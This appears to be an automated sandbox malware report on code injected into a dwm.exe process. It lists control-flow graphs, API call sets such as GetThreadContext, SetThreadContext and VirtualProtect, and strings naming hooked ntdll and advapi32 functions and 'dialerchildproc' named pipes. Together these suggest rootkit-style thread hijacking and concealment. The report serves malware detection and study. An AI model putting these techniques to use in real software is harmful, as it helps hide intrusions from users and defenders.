                                            control_flow_graph 51 2baae295c10-2baae295c37 52 2baae295c39-2baae295c48 51->52 53 2baae295c4b-2baae295c56 GetCurrentThreadId 51->53 52->53 54 2baae295c62-2baae295c69 53->54 55 2baae295c58-2baae295c5d 53->55 57 2baae295c7b-2baae295c8f 54->57 58 2baae295c6b-2baae295c76 call 2baae295a40 54->58 56 2baae29608f-2baae2960a6 call 2baae297a20 55->56 61 2baae295c9e-2baae295ca4 57->61 58->56 64 2baae295d75-2baae295d96 61->64 65 2baae295caa-2baae295cb3 61->65 70 2baae295d9c-2baae295dbc GetThreadContext 64->70 71 2baae295eff-2baae295f10 call 2baae29759f 64->71 67 2baae295cb5-2baae295cf8 call 2baae2986a0 65->67 68 2baae295cfa-2baae295d6d call 2baae2945f0 call 2baae294590 call 2baae294550 65->68 81 2baae295d70 67->81 68->81 75 2baae295dc2-2baae295de3 70->75 76 2baae295efa 70->76 84 2baae295f15-2baae295f1b 71->84 75->76 85 2baae295de9-2baae295df2 75->85 76->71 81->61 87 2baae295fde-2baae295fee 84->87 88 2baae295f21-2baae295f78 VirtualProtect FlushInstructionCache 84->88 89 2baae295e72-2baae295e83 85->89 90 2baae295df4-2baae295e05 85->90 91 2baae295ffe-2baae29600a call 2baae294ed0 87->91 92 2baae295ff0-2baae295ff7 87->92 94 2baae295fa9-2baae295fd9 call 2baae29798c 88->94 95 2baae295f7a-2baae295f84 88->95 98 2baae295ef5 89->98 99 2baae295e85-2baae295ea3 89->99 96 2baae295e07-2baae295e1c 90->96 97 2baae295e6d 90->97 113 2baae29600f-2baae296015 91->113 92->91 100 2baae295ff9 call 2baae2944c0 92->100 94->84 95->94 102 2baae295f86-2baae295fa1 call 2baae294470 95->102 96->97 103 2baae295e1e-2baae295e68 call 2baae293a50 SetThreadContext 96->103 97->98 99->98 105 2baae295ea5-2baae295eec call 2baae2939e0 99->105 100->91 102->94 103->97 105->98 116 2baae295ef0 call 2baae2975bd 105->116 117 2baae296057-2baae296075 113->117 118 2baae296017-2baae296055 ResumeThread call 2baae29798c 113->118 116->98 120 2baae296077-2baae296086 117->120 121 2baae296089 117->121 118->113 120->121 121->56
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Thread$Current$Context
                                            • String ID:
                                            • API String ID: 1666949209-0
                                            • Opcode ID: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                            • Instruction ID: 33d3bbc9aeb4fccbf067e535708c3c8336c69ba2819deccc7fd5815dae861302
                                            • Opcode Fuzzy Hash: 126e9ccac3b85b689de541a7ba0bb3b8a0d30515f50b6bbe7ef549e0900f3599
                                            • Instruction Fuzzy Hash: 1AD18C76209B8882DE709B19E4A435A77B0F78CB88F201116EACD47BA5DF3DC955CB21

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 123 2baae2951b0-2baae2951dc 124 2baae2951ed-2baae2951f6 123->124 125 2baae2951de-2baae2951e6 123->125 126 2baae295207-2baae295210 124->126 127 2baae2951f8-2baae295200 124->127 125->124 128 2baae295212-2baae29521a 126->128 129 2baae295221-2baae29522a 126->129 127->126 128->129 130 2baae295236-2baae295241 GetCurrentThreadId 129->130 131 2baae29522c-2baae295231 129->131 133 2baae295243-2baae295248 130->133 134 2baae29524d-2baae295254 130->134 132 2baae2957b3-2baae2957ba 131->132 133->132 135 2baae295256-2baae29525c 134->135 136 2baae295261-2baae29526a 134->136 135->132 137 2baae295276-2baae295282 136->137 138 2baae29526c-2baae295271 136->138 139 2baae295284-2baae2952a9 137->139 140 2baae2952ae-2baae295305 call 2baae2957c0 * 2 137->140 138->132 139->132 145 2baae295307-2baae29530e 140->145 146 2baae29531a-2baae295323 140->146 147 2baae295316 145->147 148 2baae295310 145->148 149 2baae295335-2baae29533e 146->149 150 2baae295325-2baae295332 146->150 154 2baae295386-2baae29538a 147->154 153 2baae295390-2baae295396 148->153 151 2baae295353-2baae295378 call 2baae297950 149->151 152 2baae295340-2baae295350 149->152 150->149 162 2baae29540d-2baae295422 call 2baae293da0 151->162 163 2baae29537e 151->163 152->151 156 2baae2953c5-2baae2953cb 153->156 157 2baae295398-2baae2953b4 call 2baae294470 153->157 154->153 160 2baae2953f5-2baae295408 156->160 161 2baae2953cd-2baae2953ec call 2baae29798c 156->161 157->156 167 2baae2953b6-2baae2953be 157->167 160->132 161->160 170 2baae295424-2baae29542c 162->170 171 2baae295431-2baae29543a 162->171 163->154 167->156 170->154 172 2baae29544c-2baae29549a call 2baae298d50 171->172 173 2baae29543c-2baae295449 171->173 176 2baae2954a2-2baae2954aa 172->176 173->172 177 2baae2955b7-2baae2955bf 176->177 178 2baae2954b0-2baae29559b call 2baae297520 176->178 179 2baae295603-2baae29560b 177->179 180 2baae2955c1-2baae2955d4 call 2baae294670 177->180 190 2baae29559d 178->190 191 2baae29559f-2baae2955ae call 2baae294140 178->191 183 2baae295617-2baae295626 179->183 184 2baae29560d-2baae295615 179->184 192 2baae2955d6 180->192 193 2baae2955d8-2baae295601 180->193 188 2baae295628 183->188 189 2baae29562f 183->189 184->183 187 2baae295634-2baae295641 184->187 194 2baae295643 187->194 195 2baae295644-2baae295699 call 2baae2986a0 187->195 188->189 189->187 190->177 200 2baae2955b2 191->200 201 2baae2955b0 191->201 192->179 193->177 194->195 202 2baae2956a8-2baae295741 call 2baae2945f0 call 2baae294550 VirtualProtect 195->202 203 2baae29569b-2baae2956a3 195->203 200->176 201->177 208 2baae295743-2baae295748 GetLastError 202->208 209 2baae295751-2baae2957b1 202->209 208->209 209->132
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentThread
                                            • String ID:
                                            • API String ID: 2882836952-0
                                            • Opcode ID: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                            • Instruction ID: 9bdee4946ec74bec75f0b6541dbcf37b4999663bd50239ac5b093c07517b6d87
                                            • Opcode Fuzzy Hash: 6dd4aa8fa755b3762cf53131d0cf7c3b2ca700ac8e0992d5332b6727d28f217d
                                            • Instruction Fuzzy Hash: B902CC32219B8086EB60DB55F49435AB7B0F3C8794F205115EACE87B69DF7DC858CB21

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentProcessProtectVirtual$HandleModule
                                            • String ID:
                                            • API String ID: 1092925422-0
                                            • Opcode ID: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction ID: 270950be87e8fe1fee9dfe0f43182a3e8360f859671996b8491d2433250d5d7c
                                            • Opcode Fuzzy Hash: a6312042db82c9c62213c4cc61283d131af5cc2d1631b4a6c699d8a5d8d1a662
                                            • Instruction Fuzzy Hash: 4C110C2A705B4182FF249B11F42836AB7B5F749B84F144029DEC907794EF3EC959C715

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Virtual$AllocQuery
                                            • String ID:
                                            • API String ID: 31662377-0
                                            • Opcode ID: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                            • Instruction ID: 5b76ac8afdd510a16c13e8879568d5a943fae58e3714373241059bd6c7fd04fa
                                            • Opcode Fuzzy Hash: 6886080a5e420ef5f5b7cbc5977cea8f3533897ae81ff2ee1a15dfd3048d8c27
                                            • Instruction Fuzzy Hash: 5231FD22219A4481EE709A15E47835A73B4F38C784F201525E5CE46BA8DF7EC948CB22

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Current$FileModuleNameProcessProtectThreadVirtual$CreateFindHandlePath
                                            • String ID:
                                            • API String ID: 1683269324-0
                                            • Opcode ID: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction ID: a1dcb7d7700568ba9b6c41d3491288a82564c17ddc00658e20c58dd8303fa50b
                                            • Opcode Fuzzy Hash: c29ba6944873534deeb84ee6eea4394d78c713a8ee642426403de072192bf5b7
                                            • Instruction Fuzzy Hash: 7211396061060192FF319721A92E35A33F1B75C744F6520299AC686294EF3ACC9CC633

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CacheCurrentFlushInstructionProcessProtectVirtual
                                            • String ID:
                                            • API String ID: 3733156554-0
                                            • Opcode ID: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                            • Instruction ID: ad027f71ead85750827d3b3336307486c263ecd9a580d7a943f37b3f65af9904
                                            • Opcode Fuzzy Hash: 5de13d273f800d719ddc7abbe3a208f931ebfdefdaf7bb09dce4947a89a2577f
                                            • Instruction Fuzzy Hash: 85F03026218B4480DA70DB15E4A534A77B0E3CC7D4F641111F9CD07B69CF39C588CB11

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 263 2baae262908-2baae262973 call 2baae260f34 * 4 272 2baae262b8b 263->272 273 2baae262979-2baae26297c 263->273 274 2baae262b8d-2baae262ba9 272->274 273->272 275 2baae262982-2baae262985 273->275 275->272 276 2baae26298b-2baae26298e 275->276 276->272 277 2baae262994-2baae2629b2 VirtualAlloc 276->277 277->272 278 2baae2629b8-2baae2629dc call 2baae260d6c 277->278 281 2baae2629de-2baae262a09 call 2baae260d6c 278->281 282 2baae262a0b-2baae262a12 278->282 281->282 284 2baae262a18-2baae262a25 282->284 285 2baae262ab2-2baae262ab9 282->285 284->285 289 2baae262a2b-2baae262a39 LoadLibraryA 284->289 286 2baae262abf-2baae262ad6 285->286 287 2baae262b6c-2baae262b89 285->287 286->287 290 2baae262adc 286->290 287->274 291 2baae262a9d-2baae262aa5 289->291 292 2baae262a3b-2baae262a45 289->292 295 2baae262ae2-2baae262af7 290->295 291->289 293 2baae262aa7-2baae262aac 291->293 296 2baae262a48-2baae262a4c 292->296 293->285 297 2baae262b5b-2baae262b66 295->297 298 2baae262af9-2baae262b0a 295->298 299 2baae262a4e-2baae262a52 296->299 300 2baae262a9a 296->300 297->287 297->295 302 2baae262b0c-2baae262b13 298->302 303 2baae262b15-2baae262b19 298->303 304 2baae262a7d-2baae262a87 299->304 305 2baae262a54-2baae262a7b 299->305 300->291 306 2baae262b48-2baae262b59 302->306 307 2baae262b1b-2baae262b22 303->307 308 2baae262b24-2baae262b28 303->308 309 2baae262a8d-2baae262a98 304->309 305->309 306->297 306->298 307->306 310 2baae262b3a-2baae262b3e 308->310 311 2baae262b2a-2baae262b38 308->311 309->296 310->306 312 2baae262b40-2baae262b43 310->312 311->306 312->306
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060708588.000002BAAE260000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE260000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae260000_dwm.jbxd
                                            Similarity
                                            • API ID: AllocLibraryLoadVirtual
                                            • String ID:
                                            • API String ID: 3550616410-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: 6dc81eecc31e260496d137b5d0662306798a873fb1793c76fcbd01bb7787a53d
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: 5561333370125183EF68CF19D46876DF3A5FB28B94F248221DA9A07785DB38E856C722

                                            Control-flow Graph

                                            APIs
                                              • Part of subcall function 000002BAAE291650: GetProcessHeap.KERNEL32 ref: 000002BAAE29165B
                                              • Part of subcall function 000002BAAE291650: HeapAlloc.KERNEL32 ref: 000002BAAE29166A
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2916DA
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291707
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291721
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291741
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE29175C
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE29177C
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291797
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2917B7
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE2917D2
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2917F2
                                            • Sleep.KERNEL32 ref: 000002BAAE291C43
                                            • SleepEx.KERNELBASE ref: 000002BAAE291C49
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE29180D
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE29182D
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291848
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE291868
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE291883
                                              • Part of subcall function 000002BAAE291650: RegOpenKeyExW.ADVAPI32 ref: 000002BAAE2918A3
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE2918BE
                                              • Part of subcall function 000002BAAE291650: RegCloseKey.ADVAPI32 ref: 000002BAAE2918C8
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CloseOpen$HeapSleep$AllocProcess
                                            • String ID:
                                            • API String ID: 1534210851-0
                                            • Opcode ID: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction ID: 4bfc8e8a26307a2eafaf89a01b96bc9c681df76f80ae4d9888236671a120edbf
                                            • Opcode Fuzzy Hash: 446663f49501c54a1dde533fa37134df150f915d943a345b55ac37b77b82859e
                                            • Instruction Fuzzy Hash: 3B31E32520060191FF549F37D96935A33B5AB4CBC0F366031DED987696DF25CC69C272

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 352 2baaed82908-2baaed82973 call 2baaed80f34 * 4 361 2baaed82979-2baaed8297c 352->361 362 2baaed82b8b 352->362 361->362 364 2baaed82982-2baaed82985 361->364 363 2baaed82b8d-2baaed82ba9 362->363 364->362 365 2baaed8298b-2baaed8298e 364->365 365->362 366 2baaed82994-2baaed829b2 VirtualAlloc 365->366 366->362 367 2baaed829b8-2baaed829dc call 2baaed80d6c 366->367 370 2baaed82a0b-2baaed82a12 367->370 371 2baaed829de-2baaed82a09 call 2baaed80d6c 367->371 373 2baaed82ab2-2baaed82ab9 370->373 374 2baaed82a18-2baaed82a25 370->374 371->370 376 2baaed82b6c-2baaed82b89 373->376 377 2baaed82abf-2baaed82ad6 373->377 374->373 378 2baaed82a2b-2baaed82a39 374->378 376->363 377->376 379 2baaed82adc 377->379 385 2baaed82a3b-2baaed82a45 378->385 386 2baaed82a9d-2baaed82aa5 378->386 381 2baaed82ae2-2baaed82af7 379->381 383 2baaed82af9-2baaed82b0a 381->383 384 2baaed82b5b-2baaed82b66 381->384 389 2baaed82b15-2baaed82b19 383->389 390 2baaed82b0c-2baaed82b13 383->390 384->376 384->381 391 2baaed82a48-2baaed82a4c 385->391 386->378 387 2baaed82aa7-2baaed82aac 386->387 387->373 393 2baaed82b24-2baaed82b28 389->393 394 2baaed82b1b-2baaed82b22 389->394 392 2baaed82b48-2baaed82b59 390->392 395 2baaed82a9a 391->395 396 2baaed82a4e-2baaed82a52 391->396 392->383 392->384 397 2baaed82b3a-2baaed82b3e 393->397 398 2baaed82b2a-2baaed82b38 393->398 394->392 395->386 399 2baaed82a54-2baaed82a7b 396->399 400 2baaed82a7d-2baaed82a87 396->400 397->392 402 2baaed82b40-2baaed82b43 397->402 398->392 401 2baaed82a8d-2baaed82a98 399->401 400->401 401->391 402->392
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3065262959.000002BAAED80000.00000040.00000400.00020000.00000000.sdmp, Offset: 000002BAAED80000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baaed80000_dwm.jbxd
                                            Similarity
                                            • API ID: AllocVirtual
                                            • String ID:
                                            • API String ID: 4275171209-0
                                            • Opcode ID: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction ID: d68129767a834a96e50de18453de40ab19bf911d8bbe2b168271e1e7c2de839b
                                            • Opcode Fuzzy Hash: f6ddeab5387358d888722616617f0efec67712a96652def8838ee087e5407534
                                            • Instruction Fuzzy Hash: E261347270229187EB68CF1AD45877DB3B5FB24B94F648021DA9D07789DB38E853C722

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 466 2baae292cdc-2baae292d55 call 2baae2aecc0 469 2baae292d5b-2baae292d61 466->469 470 2baae293090-2baae2930b3 466->470 469->470 471 2baae292d67-2baae292d6a 469->471 471->470 472 2baae292d70-2baae292d73 471->472 472->470 473 2baae292d79-2baae292d89 GetModuleHandleA 472->473 474 2baae292d8b-2baae292d9b call 2baae2a3090 473->474 475 2baae292d9d 473->475 477 2baae292da0-2baae292dbe 474->477 475->477 477->470 480 2baae292dc4-2baae292de3 StrCmpNIW 477->480 480->470 481 2baae292de9-2baae292ded 480->481 481->470 482 2baae292df3-2baae292dfd 481->482 482->470 483 2baae292e03-2baae292e0a 482->483 483->470 484 2baae292e10-2baae292e23 483->484 485 2baae292e33 484->485 486 2baae292e25-2baae292e31 484->486 487 2baae292e36-2baae292e3a 485->487 486->487 488 2baae292e4a 487->488 489 2baae292e3c-2baae292e48 487->489 490 2baae292e4d-2baae292e57 488->490 489->490 491 2baae292f4d-2baae292f51 490->491 492 2baae292e5d-2baae292e60 490->492 493 2baae293082-2baae29308a 491->493 494 2baae292f57-2baae292f5a 491->494 495 2baae292e72-2baae292e7c 492->495 496 2baae292e62-2baae292e6f call 2baae291a14 492->496 493->470 493->484 499 2baae292f6b-2baae292f75 494->499 500 2baae292f5c-2baae292f68 call 2baae291a14 494->500 497 2baae292e7e-2baae292e8b 495->497 498 2baae292eb0-2baae292eba 495->498 496->495 497->498 503 2baae292e8d-2baae292e9a 497->503 504 2baae292eea-2baae292eed 498->504 505 2baae292ebc-2baae292ec9 498->505 507 2baae292fa5-2baae292fa8 499->507 508 2baae292f77-2baae292f84 499->508 500->499 511 2baae292e9d-2baae292ea3 503->511 513 2baae292efb-2baae292f08 lstrlenW 504->513 514 2baae292eef-2baae292ef9 call 2baae291d28 504->514 505->504 512 2baae292ecb-2baae292ed8 505->512 509 2baae292fb5-2baae292fc2 lstrlenW 507->509 510 2baae292faa-2baae292fb3 call 2baae291d28 507->510 508->507 516 2baae292f86-2baae292f93 508->516 523 2baae292fe5-2baae292fef call 2baae293930 509->523 524 2baae292fc4-2baae292fce 509->524 510->509 528 2baae292ffa-2baae293005 510->528 521 2baae292f43-2baae292f48 511->521 522 2baae292ea9-2baae292eae 511->522 525 2baae292edb-2baae292ee1 512->525 517 2baae292f2b-2baae292f3d call 2baae293930 513->517 518 2baae292f0a-2baae292f14 513->518 514->513 514->521 519 2baae292f96-2baae292f9c 516->519 517->521 532 2baae292ff2-2baae292ff4 517->532 518->517 527 2baae292f16-2baae292f29 call 2baae291554 518->527 519->528 529 2baae292f9e-2baae292fa3 519->529 521->532 522->498 522->511 523->532 524->523 533 2baae292fd0-2baae292fe3 call 2baae291554 524->533 525->521 534 2baae292ee3-2baae292ee8 525->534 527->517 527->521 537 2baae293007-2baae29300b 528->537 538 2baae29307c-2baae293080 528->538 529->507 529->519 532->493 532->528 533->523 533->528 534->504 534->525 543 2baae293013-2baae29302d call 2baae2986a0 537->543 544 2baae29300d-2baae293011 537->544 538->493 547 2baae293030-2baae293033 543->547 544->543 544->547 550 2baae293035-2baae293053 call 2baae2986a0 547->550 551 2baae293056-2baae293059 547->551 550->551 551->538 553 2baae29305b-2baae293079 call 2baae2986a0 551->553 553->538
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: lstrlen$FileHandleModuleName$AddressCloseFindOpenPathProcProcess
                                            • String ID: NtQueryObject$\Device\Nsi$ntdll.dll
                                            • API String ID: 2119608203-3850299575
                                            • Opcode ID: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction ID: 95cab264222ae3322cd4bccd663f917f2f02c5f6d4a78e03958826a915f3b661
                                            • Opcode Fuzzy Hash: 2588cc794520ead529bdc0a32c038e4709a5f15ae479e9f47b13431256f42674
                                            • Instruction Fuzzy Hash: B3B1B032210A5082EF688F29E4687A973B4FB4CB84F646016EEC953794DF76CD98C361
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                            • String ID:
                                            • API String ID: 3140674995-0
                                            • Opcode ID: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction ID: d1091acc2dd2400463f12bd56833495dc32d8c2ad57b8a25767a2abce1793302
                                            • Opcode Fuzzy Hash: 1239a149ef62a939d07da7a6345777f7e6476c10c46ebdc58c2fff80381e5b80
                                            • Instruction Fuzzy Hash: 04317072204B8086EF608F60E8643ED7371F788744F54442ADA8D47B98EF38C94CC720
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: ExceptionFilterUnhandled$CaptureContextDebuggerEntryFunctionLookupPresentUnwindVirtual
                                            • String ID:
                                            • API String ID: 1239891234-0
                                            • Opcode ID: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction ID: 2de0741a9e7c44065691814522c5d4c79a5c3333bff1a02a6aba22cbf1d6c8aa
                                            • Opcode Fuzzy Hash: b9fdfb6abdc39c0bfa3e984213bb5a27592c3a0080b3e524afb5147b282a99cd
                                            • Instruction Fuzzy Hash: 5A316D32204F8086EB60CF25E85439E73B4F789B58F640526EADD43BA9DF38C959CB11
                                            APIs
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: ErrorFileLastWrite$ConsoleOutput
                                            • String ID:
                                            • API String ID: 1443284424-0
                                            • Opcode ID: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction ID: a859049abdb16ce4ebf42fd7aa69fcbe0bfb847c249d9fbfc8642fcfb804d372
                                            • Opcode Fuzzy Hash: 85b244371d408b05e75db82bfcedca3f922ea5a775ba2aedb63ed3d562987fa1
                                            • Instruction Fuzzy Hash: 28E1F372B14B809EEB10CF64D4A86DD7BB1F3497C8F244116DE8A57B99DB34C82AC711

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
                                            • String ID: d
                                            • API String ID: 2005889112-2564639436
                                            • Opcode ID: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction ID: b50dc7ca44172374ecb8a152eb7f1271102f938ee15b38396310bd3df9ef205d
                                            • Opcode Fuzzy Hash: b748d707dce532ba85059e887555c778ed1ca062867acd86e7106c3b72fc9f19
                                            • Instruction Fuzzy Hash: 75516A72214B84D3EB24CF62E55839EB3B1F78CB80F698124DA8947B14DF38C46ACB51

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: CurrentThread$AddressHandleModuleProc
                                            • String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$advapi32.dll$ntdll.dll$sechost.dll
                                            • API String ID: 4175298099-1975688563
                                            • Opcode ID: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction ID: 62048474f1622cef0cd1ed3fd92ed1851e8e67166020a3114eb23de86730bcf9
                                            • Opcode Fuzzy Hash: 4311b3b4e112faf7cd717d4cb8614ddd441db72e36ac1e322346e5d8367ce93d
                                            • Instruction Fuzzy Hash: 9E31A7A6201A4AA0FE54EF68F8797D83335BB4C344FB464139599031769F398A6EC372

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
                                            • String ID: \\.\pipe\dialerchildproc32$\\.\pipe\dialerchildproc64
                                            • API String ID: 2171963597-1373409510
                                            • Opcode ID: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction ID: 94df7aad55870c6114d792a3ca31530cc33901cf673093f76ee9391ce6b5f9b3
                                            • Opcode Fuzzy Hash: 81a5590feb268d746862aeeaca95d5a7bb0e3fb4412a03f66270e8c9225f983f
                                            • Instruction Fuzzy Hash: 29213D36614B4082FB108B25F46835E73B0F789BA4F605215EA9903BA8CF7DC559CB12
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 0000000A.00000002.3060780940.000002BAAE290000.00000040.00000001.00020000.00000000.sdmp, Offset: 000002BAAE290000, based on PE: true
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_10_2_2baae290000_dwm.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                            • String ID: d
                                            • API String ID: 3743429067-2564639436
                                            • Opcode ID: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
                                            • Instruction ID: 2137402fa7a4f9d3f487ec589900a2554cd92a97186cd8a2ced61d72f102976b
                                            • Opcode Fuzzy Hash: ed3eaeac9b5240f017c69614fb8be245425dbd9313f990ab10755c486963d35d
